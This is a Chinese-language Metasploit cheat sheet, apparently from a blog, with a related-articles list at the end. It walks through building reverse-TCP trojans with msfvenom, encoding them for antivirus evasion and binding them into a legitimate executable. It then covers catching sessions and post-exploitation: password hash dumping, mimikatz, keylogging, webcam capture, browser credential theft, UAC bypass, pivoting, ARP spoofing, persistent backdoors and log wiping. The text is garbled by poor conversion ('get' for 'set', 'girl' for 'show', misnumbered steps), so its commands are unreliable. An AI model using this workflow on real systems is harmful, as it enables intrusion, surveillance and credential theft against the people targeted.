MSF常用命令
Msf是kali下的這款強勁的專用工具,開源系統的網路安全問題測試工具前滲入後滲入環節都用獲得,只有還是後滲入環節用的多。
Msf用途大概就是說exploit進攻,cve進攻,遠端控制木馬病毒進攻運用。
Msfconsole 開啟msf
Msfconsole -h 協助選擇項
Banner 用以查詢metasploit的版本資訊,運用控制模組總數、payload總數
控制模組詳細介紹:
Exploits 滲入進攻控制模組 主要用於進攻方式
Auxiliary 輔助控制模組 主要用於資訊內容蒐集
Payloads 進攻荷載控制模組 主要用於進攻實際效果、總體目標
Encodes 編號控制模組 主要用於編碼轉換、掩藏
Post 後滲透測試控制模組 主要用於滲入後的解決,比如留有側門等
通常應用步驟:
search 名字 檢索系統漏洞
use 控制模組 挑選進攻控制模組
get RHOST ip 設定進攻ip
get RPORT 445 設定進攻埠號
girl payloads 查詢能用payloads
get payload windows/meterperter/bind_tcp -設定進攻荷載
get LHOST ip 監視應用程式ip
get LPORT 4444 設定監視的埠號
girl options 查詢設定好的主要引數
exploit 進行進攻
info 查詢所屬控制模組的資訊內容
back 撤出當今系統漏洞控制模組,挑選別的的系統漏洞控制模組
exploits:運用漏洞開展進攻
payload:取得成功 exploit 以後,真實在總體目標系統軟體實行的編碼或命令
connect 用以遠端控制連線伺服器,通常用以內部網滲入。
connect 192.168.9.1 8080 connect+iP+伺服器埠
exit 撤出msfconsole的指令。
search 系統漏洞名字 開展系統漏洞控制模組或軟體的搜尋
遠端控制木馬病毒:
轉化成Shellcode指令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=埠號 -f exe -o /root/feizhu/fz.exe
Msfvenom適用諸多自然環境下payload有效載荷,如linux,android,windons等
應用指令查詢msfvenom –list payloads 依據必須挑選荷載
對shellcode開展編號:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b ‘\x00’ lhost=ip lport=埠號 -f exe -o /root/feizhu/zhu.exe
Msfvenom適用的伺服電機許多,每一伺服電機的免殺實際效果都不同,依據必須挑選。
查詢伺服電機 msfvenom –list encoders
注:並不一定的編碼方式都會windows系統軟體上能用
Msf終究是開源系統的,免殺實際效果不太好。
我們普遍的免殺方法有:改動特徵碼/改動程式流程通道點/花指令/加殼等
將轉化成的木馬病毒捆縛到別的程式流程中:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=埠號 -e x86/shikata_ga_nai -x IPradar5.exe(捆縛的程式流程) -i 13 -k(將系統程式提取) -f exe -o /root/feizhu/fz.exe
監視shellcode (當木馬病毒在總體目標機實行後,用此作用取得應用程式,深化滲入)
use exploit/multi/handler 挑選控制模組
get payload windows/meterpreter/reverse_tcp 設定的payload荷載要跟我們轉化成木馬病毒時的荷載相同。
get LHOST ip 設定監視的ip
get LPORT 4444 設定監視的埠號
exploit 剛開始監視,進行此步後,在總體目標裝置實行木馬病毒只能取得session應用程式。
需注意payload微小差別:
人們挑選的payload監聽器是有差別的:
windows/shell_reverse_tcp 這一是歸屬於Unstaged。即必須應用nc監視埠號來拿
到反跳shell 。 比如:nc -nvlp [伺服器埠]
windows/shell/reverse_tcp 這一是歸屬於Staged。即必須應用msf的
exploit/multi/handler來取得session應用程式。
那麼根據系統漏洞進攻或是遠端控制木馬病毒取得sessions應用程式以後,更進一步滲入,則必須的指令給出:
Meterpreter應用程式下:
background 把meterpreter後臺管理離線
sessions -l 查詢全部的應用程式
sessions -i 1 挑選應用程式
shell 獲得總體目標伺服器的遠端命令列shell
ipconfig 查詢網際網路主要引數
getwd 獲得系統軟體工作中的當前目錄
getuid 查詢早已得到的管理許可權
portfwd 埠轉發 總體目標伺服器上開啟了3389,可是隻容許特殊iP瀏覽,進攻伺服器沒法聯接,可以應用portfwd指令把總體目標伺服器的3389埠轉發到別的埠號開啟
portfwd Add -l 你該機的監視埠號 -r 127.0.0.1 -p 3389 將總體目標裝置3389傳送到kali當地埠號
rdesktop 127.1.1.0:2222 實行windows遠端控制連線,這一埠號就是說上一步傳送的埠號。
upload 檔案上傳到總體目標伺服器
upload fz.exe C:\windows\system32\
download 將總體目標伺服器上的檔案下載到人們的進攻伺服器上
download C:\users\wd.txt /root/feizhu/
search -d c:\ -f *.doc 檢索特定尾綴文件
route 顯示資訊總體目標伺服器上的伺服器路由表
sysinfo 查詢總體目標主機系統資訊內容
systeminfo 查詢系統軟體詳細資料及傻瓜包資訊內容
migrate將meterpreter應用程式移殖到另外系統程式
migrate 1668(引入系統程式的pid) 將木馬病毒系統程式引入到系統軟體別的系統程式
hashdump 載入雜湊值
load mimikatz 起動mimikatz
wdigest 載入?沒藶耄╩imikatz下指令)
run getgui -e 開啟遠端桌面服務
run getgui -u feizhu -p feizhu 加上登入遠端桌面的賬戶密碼
提權:
應用程式下要getsystem 取得系統軟體最大許可權
取得meterpreter應用程式後提高最大許可權:
1.systeminfo 查詢漏洞補丁資訊內容,搜尋有關上溢系統漏洞提權
2.use+系統漏洞控制模組 應用系統漏洞控制模組
3.get sessions 1 設定開展提權的應用程式裝置
11.查詢回到資訊內容,會有個新的system管理許可權系統程式,用migrate將本來的應用程式系統程式引入到system系統程式中,取得最大許可權。
應用Bypassuac提權:(當實行getsystem失效時)
1.search bypassuac 檢索控制模組
2.use 控制模組名字 應用控制模組
3.get sessions 應用程式名字 挑選提權的應用程式
11.run 實行
4.會回到1個新的應用程式,進入應用程式若不是最大許可權,實行getsystem只能。
取得meterpreter應用程式後怎麼才能合理的提權呢?
大夥兒瞭解msf中內建的系統漏洞控制模組過多,全部我們可以用msf內建指令協助我們開展提權。
1.把session應用程式掛上去後臺管理
2. use post/multi/recon/local_exploit_suggester
3.get LHOST ip
11.get session 1
4.exploit
實行以後見到的結果就是說對於當今系統軟體將會提權取得成功的漏洞利用控制模組。
鍵盤記錄器作用keyscan:
keyscan_start 開啟紀錄總體目標伺服器的鍵盤輸入
keyscan_dump 輸出捕獲到的總體目標鍵盤輸入空格符資訊內容
keyscan_stop 終止鍵盤記錄
run vnc 開啟實時監控介面
webcam_stream 開啟監控攝像頭
migrate 616 關掉另一方伺服器防火牆
screenshot 手機截圖
後滲入控制模組應用:
run post/windows/gather/enum_applications 獲得總體目標伺服器程式安裝資訊內容
run post/windows/gather/dumplinks獲得總體目標伺服器上近期瀏覽過的文字文件、連線資訊內容
run post/windows/gather/enum_Ie 載入總體目標伺服器ie瀏覽器電腦瀏覽器cookies等快取檔案資訊內容,嗅探總體目標伺服器登陸過的各種賬戶密碼,資訊內容儲放在/root/.msf5/loot/檔案目錄下。
msf路由器傳送控制模組:
MSF架構中內建的1個路由器傳送作用,其保持全過程就是說MSF架構在早已獲得的meterpreter shell的基本上加上這條前往“內部網”的路由器,此路由器的下一個跳傳送,即閘道器ip是MSF進攻服務平臺與黑客攻擊總體目標建立的1個session應用程式 。
run set_local_subnets 查詢已拿到的總體目標伺服器的內部網iP段狀況(路由器詳細地址)
run autoroute -s ip/28 加上路由器(把這一ip段範疇加進路由器)
run autoroute -p 查詢加上的路由器
+run autorouute -d 刪掉加上的路由器
隨後,我們能用進攻內部網別的裝置:
fping -asg 192.168.93.0/28 查詢內部網免費線上伺服器
arpspoof -i eth0 -t 總體目標iP 閘道器ipiP ARP矇騙
長久側門:
run persistence -S -U -X -i 5 -p 埠號 -r ip
-S:開機啟動時載入
-U:客戶登入時載入
-X:啟動時全自動載入
-i:回連的間隔時間
-r:你的接受shell的電腦上iP
clearev 擦掉印痕
相關文章
- kali 升級msf到msf6
- MSF命令大全
- Metasploit(MSF)基礎使用
- Cobalt Strike 與 MSF 聯動
- Cobaltstrike與MSF會話派生會話
- msf stagers開發不完全指北(四): msf 中使用域前置技術隱藏流量
- 內網滲透 Metasploit(MSF)基礎使用內網
- msf stagers開發不完全指北(二)
- CVE-2017-6090&msf的基本使用(一)
- 使用msf生成shellcode並用Go免殺?Go
- 將 MSF 捆綁進入正常的APP 程式中APP
- 【滲透測試筆記】之【MSF 弱點掃描】筆記
- 20211317李卓桐 Exp6 MSF攻防實踐 實驗報告
- CS配合MSF互傳許可權 以及使用mimikatz抓取明文密碼密碼
- 企業應用架構研究系列二:MSF&Scrum 專案管理應用架構Scrum專案管理
- 【PG常用命令】Postgresql常用命令之大小SQL
- 常用命令
- 【CTF】msf和impacket聯合拿域控內網滲透-拿域控內網
- Git日常常用命令和ADB常用命令Git
- Metasploit(msf)利用ms17_010(永恆之藍)出現Encoding::UndefinedConversionError問題EncodingUndefinedError
- 常用命令列命令列
- lldb常用命令LLDB
- Solaris常用命令
- Dockers常用命令Docker
- RN常用命令
- MongoDB常用命令MongoDB
- DOS 常用命令
- HDFS常用命令
- hexo常用命令Hexo
- ffprobe常用命令
- 常用命令--curl
- Windows常用命令Windows
- PIP常用命令
- VIM常用命令
- mysql常用命令MySql
- 常用命令-cd
- Redis 常用命令Redis
- CentOS常用命令CentOS